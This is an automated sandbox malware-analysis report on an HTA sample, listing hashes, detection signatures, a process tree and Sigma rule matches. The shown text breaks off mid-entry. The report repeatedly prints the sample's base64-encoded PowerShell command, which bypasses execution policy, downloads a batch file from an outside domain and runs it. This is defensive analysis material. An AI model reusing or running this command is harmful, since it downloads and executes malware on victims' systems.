Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:c2.hta
Analysis ID:1589450
MD5:18f2197e51378d2fc3f6d250aca9a459
SHA1:b58941e542d1c4ec72c3ca925794e1de9c5d0338
SHA256:525d22cf62c199246896579367e361fae0dc4e80ad76076965546f7647a9c491
Tags:htauser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6980 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 5064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6980, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsP
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6980, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsP
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6980, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsP
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6980, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsP
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: 